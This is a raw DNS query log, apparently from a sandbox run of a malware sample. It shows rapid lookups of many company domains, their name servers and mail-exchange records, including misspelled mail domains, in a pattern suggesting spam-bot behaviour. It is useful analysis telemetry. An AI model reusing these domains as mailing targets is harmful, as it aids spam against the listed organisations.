                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.142347097 CEST1.1.1.1192.168.2.30xc846No error (0)top1oil.com104.26.0.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:18.461925983 CEST1.1.1.1192.168.2.30xe426No error (0)ccrsi.org198.209.253.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.287899971 CEST1.1.1.1192.168.2.30xcef1No error (0)onzcda.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.371262074 CEST1.1.1.1192.168.2.30x3f37No error (0)dspears.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.371262074 CEST1.1.1.1192.168.2.30x3f37No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.371262074 CEST1.1.1.1192.168.2.30x3f37No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.371262074 CEST1.1.1.1192.168.2.30x3f37No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:19.619335890 CEST1.1.1.1192.168.2.30xb81aNo error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.253946066 CEST1.1.1.1192.168.2.30xbfe1No error (0)usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.486275911 CEST1.1.1.1192.168.2.30xf1fbNo error (0)kavram.com172.67.189.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.486275911 CEST1.1.1.1192.168.2.30xf1fbNo error (0)kavram.com104.21.89.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.552686930 CEST1.1.1.1192.168.2.30x381dNo error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.652318954 CEST1.1.1.1192.168.2.30xa36eNo error (0)oozkranj.com212.44.102.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.678121090 CEST1.1.1.1192.168.2.30x58dfNo error (0)hamaker.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.678121090 CEST1.1.1.1192.168.2.30x58dfNo error (0)hamaker.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.975359917 CEST1.1.1.1192.168.2.30x7704Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.978204012 CEST1.1.1.1192.168.2.30x1c63No error (0)nrsi.com76.223.35.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:20.979033947 CEST1.1.1.1192.168.2.30xb1ebNo error (0)shteeble.com185.106.129.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.141282082 CEST1.1.1.1192.168.2.30xdf8No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.150114059 CEST1.1.1.1192.168.2.30xf9b7No error (0)fortknox.bm216.177.137.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.619452953 CEST1.1.1.1192.168.2.30x2efaNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.690685987 CEST1.1.1.1192.168.2.30x2ba2No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.711952925 CEST1.1.1.1192.168.2.30x978fNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:21.722894907 CEST1.1.1.1192.168.2.30x2efaNo error (0)wolffkran.de46.4.56.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.064830065 CEST1.1.1.1192.168.2.30x614No error (0)mcseurope.nl46.19.218.80A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.359869003 CEST1.1.1.1192.168.2.30xa3ccNo error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.359869003 CEST1.1.1.1192.168.2.30xa3ccNo error (0)smtp.mail.global.gm0.yahoodns.net67.195.12.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.359869003 CEST1.1.1.1192.168.2.30xa3ccNo error (0)smtp.mail.global.gm0.yahoodns.net66.218.88.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.359869003 CEST1.1.1.1192.168.2.30xa3ccNo error (0)smtp.mail.global.gm0.yahoodns.net66.163.170.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.786129951 CEST1.1.1.1192.168.2.30x2687No error (0)dns1.cscdns.net156.154.130.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.854255915 CEST1.1.1.1192.168.2.30x3f54No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.985738039 CEST156.154.130.100192.168.2.30x8fefNo error (0)emerson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:22.985738039 CEST156.154.130.100192.168.2.30x8fefNo error (0)emerson.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.038839102 CEST45.142.220.39192.168.2.30x85eeName error (3)gnail.itnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.117227077 CEST1.1.1.1192.168.2.30x2070Server failure (2)www.medisa.infononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.205427885 CEST1.1.1.1192.168.2.30x6825No error (0)ons1.nifty.ad.jp202.248.20.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.336623907 CEST1.1.1.1192.168.2.30x6007No error (0)rkengg.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.336623907 CEST1.1.1.1192.168.2.30x6007No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.336623907 CEST1.1.1.1192.168.2.30x6007No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.336623907 CEST1.1.1.1192.168.2.30x6007No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.376131058 CEST108.162.193.181192.168.2.30x15f1No error (0)perkinsrestaurants.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.380275011 CEST1.1.1.1192.168.2.30xb882No error (0)a6-65.akam.net23.211.133.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.607739925 CEST23.211.133.65192.168.2.30xc1f1No error (0)sjm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.607739925 CEST23.211.133.65192.168.2.30xc1f1No error (0)sjm.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.632030010 CEST1.1.1.1192.168.2.30x22c3No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.632030010 CEST1.1.1.1192.168.2.30x22c3No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.661655903 CEST1.1.1.1192.168.2.30x10f2No error (0)atb-lit.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.716331959 CEST216.200.63.28192.168.2.30x4ef2No error (0)irvingisd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.716331959 CEST216.200.63.28192.168.2.30x4ef2No error (0)irvingisd.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.742562056 CEST54.234.211.80192.168.2.30x4ef2No error (0)tvcskyshop.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.816725016 CEST162.159.26.27192.168.2.30xcbf2No error (0)troygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.816725016 CEST162.159.26.27192.168.2.30xcbf2No error (0)troygroup.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.864943981 CEST120.76.107.42192.168.2.30x4ef2No error (0)bpai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.864943981 CEST120.76.107.42192.168.2.30x4ef2No error (0)bpai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:23.974705935 CEST1.1.1.1192.168.2.30xb1fcNo error (0)dns1.yandex.net213.180.204.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.067311049 CEST1.1.1.1192.168.2.30xbee2No error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.139098883 CEST1.1.1.1192.168.2.30x1c20Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.140134096 CEST1.1.1.1192.168.2.30x9ceeNo error (0)ns1.securetrafficrouting.com139.144.190.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.140134096 CEST1.1.1.1192.168.2.30x9ceeNo error (0)ns1.securetrafficrouting.com139.144.190.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.304559946 CEST1.1.1.1192.168.2.30xf94dNo error (0)ns10.dnsmadeeasy.com208.94.148.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.340809107 CEST213.180.204.213192.168.2.30x13f4No error (0)molodin.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.370008945 CEST139.144.190.94192.168.2.30xbff4No error (0)windsream.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.467328072 CEST212.48.124.53192.168.2.30xbff4No error (0)ahbc.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.476524115 CEST1.1.1.1192.168.2.30xc4f8No error (0)ns1.centralnic.net194.169.218.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.477824926 CEST208.94.148.4192.168.2.30x5bf5No error (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.477824926 CEST208.94.148.4192.168.2.30x5bf5No error (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.477824926 CEST208.94.148.4192.168.2.30x5bf5No error (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.477824926 CEST208.94.148.4192.168.2.30x5bf5No error (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.477824926 CEST208.94.148.4192.168.2.30x5bf5No error (0)marcovasco.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.645548105 CEST194.169.218.24192.168.2.30x7f6No error (0)fletchers.uk.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.749870062 CEST1.1.1.1192.168.2.30x9e99Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.790752888 CEST1.1.1.1192.168.2.30xff24No error (0)ns1.telekom.net212.185.24.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.914711952 CEST1.1.1.1192.168.2.30x7537No error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:24.989213943 CEST185.159.196.2192.168.2.30x3ff7Name error (3)coldmail.canonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.033612967 CEST192.31.80.30192.168.2.30x8ef7Name error (3)cabonet.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.072858095 CEST139.144.190.94192.168.2.30x7ef7No error (0)windsream.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.103171110 CEST199.19.56.1192.168.2.30xadf7Name error (3)nbhn.orgnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.105892897 CEST212.185.24.65192.168.2.30x3ff7No error (0)primex-steel.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.105892897 CEST212.185.24.65192.168.2.30x3ff7No error (0)primex-steel.deMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.146375895 CEST1.1.1.1192.168.2.30x8906No error (0)ns-1497.awsdns-59.org205.251.197.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.292176962 CEST1.1.1.1192.168.2.30xfe96No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.292176962 CEST1.1.1.1192.168.2.30xfe96No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.292176962 CEST1.1.1.1192.168.2.30xfe96No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.313591003 CEST1.1.1.1192.168.2.30x98f6No error (0)ns2.moakt.com64.31.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.340774059 CEST205.251.197.217192.168.2.30xa7f8No error (0)mbn.nifty.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.476327896 CEST64.31.33.50192.168.2.30x53f9No error (0)disbox.orgMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.545254946 CEST216.92.151.254192.168.2.30x62f9No error (0)zzconsult.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.556421995 CEST104.243.174.200192.168.2.30x72f9No error (0)cp-tel.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.565685034 CEST64.68.192.10192.168.2.30x72f9No error (0)avivadirectory.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.606107950 CEST1.1.1.1192.168.2.30x3b0dNo error (0)uns01.lolipop.jp157.7.190.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.615747929 CEST1.1.1.1192.168.2.30x3901No error (0)aluminox.es94.23.84.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.633151054 CEST1.1.1.1192.168.2.30x25efNo error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.633151054 CEST1.1.1.1192.168.2.30x25efNo error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.701033115 CEST213.180.204.213192.168.2.30x72f9No error (0)sochi.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.773514986 CEST1.1.1.1192.168.2.30x8481No error (0)pns3.cloudns.net185.136.98.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.879955053 CEST157.7.190.91192.168.2.30x7cfaNo error (0)2525chintai.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.930322886 CEST1.1.1.1192.168.2.30xfb55Name error (3)anteph.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.947504044 CEST185.136.98.111192.168.2.30x18fbNo error (0)pruamerican.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:25.983366966 CEST1.1.1.1192.168.2.30xaa20No error (0)ns378.canadianwebhosting.com23.111.64.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.182945013 CEST23.111.64.50192.168.2.30xf3fbNo error (0)sutcast.caMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.322925091 CEST1.1.1.1192.168.2.30xac92No error (0)dns1.minas.com.br45.32.160.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.488302946 CEST1.1.1.1192.168.2.30x9cd0No error (0)ns1.mytrafficmanagement.com139.144.190.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.488302946 CEST1.1.1.1192.168.2.30x9cd0No error (0)ns1.mytrafficmanagement.com139.144.190.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.558923960 CEST45.32.160.60192.168.2.30x3bfdNo error (0)feital.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.660419941 CEST1.1.1.1192.168.2.30xc3f0No error (0)ns23.worldnic.com162.159.26.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.717844963 CEST139.144.190.94192.168.2.30xe7fdNo error (0)alltell.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.751646996 CEST1.1.1.1192.168.2.30xd0b1No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.769892931 CEST1.1.1.1192.168.2.30x456bNo error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.769892931 CEST1.1.1.1192.168.2.30x456bNo error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.877270937 CEST162.159.26.132192.168.2.30x92feNo error (0)leewarner.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.877270937 CEST162.159.26.132192.168.2.30x92feNo error (0)leewarner.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.890794992 CEST35.173.125.78192.168.2.30x92feNo error (0)fgpcpa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:26.890794992 CEST35.173.125.78192.168.2.30x92feNo error (0)fgpcpa.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.455116987 CEST1.1.1.1192.168.2.30x680No error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.455116987 CEST1.1.1.1192.168.2.30x680No error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.455116987 CEST1.1.1.1192.168.2.30x680No error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.455116987 CEST1.1.1.1192.168.2.30x680No error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.629899025 CEST1.1.1.1192.168.2.30x1f14No error (0)ns3.ilovedongbu.com210.124.234.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.898847103 CEST1.1.1.1192.168.2.30x8ab4No error (0)ns.w2hdns2.com162.248.50.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.985059023 CEST210.124.234.15192.168.2.30x5b02No error (0)dbins.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.985059023 CEST210.124.234.15192.168.2.30x5b02No error (0)dbins.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.985059023 CEST210.124.234.15192.168.2.30x5b02No error (0)dbins.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:27.985059023 CEST210.124.234.15192.168.2.30x5b02No error (0)dbins.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.039819002 CEST1.1.1.1192.168.2.30xb7b3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.039864063 CEST1.1.1.1192.168.2.30xb7b3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.039890051 CEST1.1.1.1192.168.2.30xb7b3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.039958954 CEST1.1.1.1192.168.2.30xb7b3Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.075790882 CEST1.1.1.1192.168.2.30xba6bNo error (0)ns1.parkingcrew.net13.248.158.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.112999916 CEST162.248.50.188192.168.2.30x7403No error (0)segnidivik.itMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.267925024 CEST13.248.158.159192.168.2.30x3004No error (0)pylypiuk.qmal.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.481147051 CEST103.20.213.251192.168.2.30x3004No error (0)rapinfosolutions.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:28.908719063 CEST1.1.1.1192.168.2.30x85baNo error (0)t-mould.com81.169.145.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.030287027 CEST1.1.1.1192.168.2.30xe4d0No error (0)kallman.net0.0.0.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.313136101 CEST1.1.1.1192.168.2.30x563cNo error (0)ns01.memail-dns.com35.168.156.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.313150883 CEST1.1.1.1192.168.2.30x563cNo error (0)ns01.memail-dns.com35.168.156.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.313179970 CEST1.1.1.1192.168.2.30x563cNo error (0)ns01.memail-dns.com35.168.156.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.478044033 CEST1.1.1.1192.168.2.30x9f84No error (0)dns1.p04.nsone.net198.51.44.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.484227896 CEST1.1.1.1192.168.2.30x6fa3No error (0)forbin.net172.67.148.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.484227896 CEST1.1.1.1192.168.2.30x6fa3No error (0)forbin.net104.21.41.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.543102026 CEST35.168.156.90192.168.2.30x960dNo error (0)newmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.543102026 CEST35.168.156.90192.168.2.30x960dNo error (0)newmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.543102026 CEST35.168.156.90192.168.2.30x960dNo error (0)newmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.543102026 CEST35.168.156.90192.168.2.30x960dNo error (0)newmail.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.569020033 CEST1.1.1.1192.168.2.30x610eServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641165972 CEST198.51.44.4192.168.2.30x710eNo error (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641165972 CEST198.51.44.4192.168.2.30x710eNo error (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641165972 CEST198.51.44.4192.168.2.30x710eNo error (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641165972 CEST198.51.44.4192.168.2.30x710eNo error (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641165972 CEST198.51.44.4192.168.2.30x710eNo error (0)j2.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641506910 CEST163.114.216.49192.168.2.30x710eNo error (0)vitacy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.641506910 CEST163.114.216.49192.168.2.30x710eNo error (0)vitacy.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.647993088 CEST103.224.182.6192.168.2.30x810eNo error (0)gaimil.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.795063972 CEST192.12.94.30192.168.2.30xd0fName error (3)cpcgunion.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.810375929 CEST193.189.160.11192.168.2.30x810eNo error (0)siol.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.879081011 CEST192.12.94.30192.168.2.30x5b0fName error (3)pettigna.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.899559021 CEST185.159.196.2192.168.2.30x5b0fName error (3)taxperts.on.canonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.942918062 CEST1.1.1.1192.168.2.30x14f5No error (0)akr.co.id104.20.122.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.942918062 CEST1.1.1.1192.168.2.30x14f5No error (0)akr.co.id172.67.33.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:30.942918062 CEST1.1.1.1192.168.2.30x14f5No error (0)akr.co.id104.20.123.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.086138010 CEST1.1.1.1192.168.2.30x7cdbNo error (0)hasslo.ns.cloudflare.com108.162.195.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:51:31.086138010 CEST1.1.1.1192.168.2.30x7cdbNo error (0)hasslo.ns.cloudflare.com162.159.44.134A (IP address)IN (0x0001)false
